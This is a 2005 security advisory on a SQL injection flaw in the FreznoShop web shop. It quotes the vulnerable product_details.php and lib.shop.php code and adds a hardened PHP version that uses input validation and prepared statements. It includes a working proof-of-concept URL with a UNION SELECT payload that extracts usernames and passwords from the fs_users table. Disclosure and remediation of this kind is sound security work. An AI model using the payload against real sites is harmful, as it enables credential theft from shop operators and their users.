Versions of FreznoShop below 1.4.1 are vulnerable to SQL injection attacks due to a lack of input validation on parameters used in database queries. Sample exploitation provided.
FreznoShop Vulnerability Details
Date: May 13, 2005
Mike Shema <mshema@ntobjectives.com>
Versions of FreznoShop
(http://www.freznoshop.de/) below 1.4.1
are vulnerable to SQL injection due to the use of unvalidated
parameters in database queries. Some unpatched versions of 1.4.1 are
vulnerable as well.
The value of the 'id' parameter is passed directly to the SQL query
function. No validation of content or filtering of malicious
characters is performed. Database error messages are suppressed such
that they will not reach the web browser, but this does not prevent
arbitrary queries from being constructed. The following URL
demonstrates a value for 'id' that displays a user's username and
password in the HTML response:
http://site/freznoshop/product_details.php?id=1+UNION+SELECT+1,u_password,u_name,1,1,1,1,1,1,1,1,1+FROM+fs_users+LIMIT+1,1
The specific problem lies in the product_details.php and
libclasses/lib.shop.php files.
product_details.php, c. line 63
-------------------------------
...
$prod = loadProduct($HTTP_GET_VARS['id']);
...
-------------------------------
libclasses/lib.shop.php, c. line 83
-----------------------------------
...
function loadProduct($id)
{
    $table1 = DB_PREFIX .'products p';
    $table2 = DB_PREFIX .'products_categories pc';
    // $id arrives straight from $HTTP_GET_VARS['id'] and is interpolated
    // into the query string without any type check or quoting.
    $sql = db_query("SELECT p.p_id,
                            p.p_item_nr,
                            p.p_name,
                            p.p_desc,
                            p.p_desc_long,
                            p.p_image,
                            p.p_price,
                            p.p_show_img,
                            p.p_sp_price,
                            p.p_has_special,
                            p.p_has_style,
                            pc.category_id
                     FROM $table1, $table2
                     WHERE p.p_id = pc.product_id
                     AND p.p_id = $id
                    ");
...
-----------------------------------
Users of this application should download the latest version of
FreznoShop, which implements an is_numeric() check of the $id
parameter in the product_details.php file to prevent this particular
attack.
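As an added example (not FreznoShop's own code), the following is a hardened loadProduct() of the kind the fix above calls for: it rejects anything that is not an unsigned decimal integer before the query is built, and binds the value as a typed parameter rather than interpolating it. It assumes a mysqli connection $db with mysqlnd (for get_result()) and the same DB_PREFIX constant as the original; validateProductId() and loadProductSafe() are names chosen here. Note that is_numeric() alone also accepts "1.5", " 1", "1e3" (and "0x1A" on PHP < 7), so a stricter check is used.

```php
<?php
// Added example, not FreznoShop code. Assumes a mysqli $db and DB_PREFIX.

function validateProductId($id)
{
    // Accept only a string or int made entirely of decimal digits.
    // ctype_digit() on an int checks its ASCII code, so cast first.
    if (!is_string($id) && !is_int($id)) {
        return null;
    }
    $id = (string) $id;
    // Empty string fails ctype_digit(); length guard avoids int overflow.
    if (!ctype_digit($id) || strlen($id) > 10) {
        return null;
    }
    return (int) $id;
}

function loadProductSafe(mysqli $db, $rawId)
{
    $id = validateProductId($rawId);
    if ($id === null) {
        return false;   // caller treats this as "product not found"
    }
    $table1 = DB_PREFIX . 'products p';
    $table2 = DB_PREFIX . 'products_categories pc';
    // Table names come from a constant, never from the request; the only
    // request-derived value is bound through a typed placeholder.
    $stmt = $db->prepare("SELECT p.p_id, p.p_name, p.p_price, pc.category_id
                          FROM $table1, $table2
                          WHERE p.p_id = pc.product_id
                          AND p.p_id = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: false;
}

// Constructed inputs: a normal id, and the shape of the advisory's payload,
// which validateProductId() rejects before any SQL is assembled.
var_dump(validateProductId('1'));
var_dump(validateProductId('1 UNION SELECT 1,u_password,u_name FROM fs_users'));
```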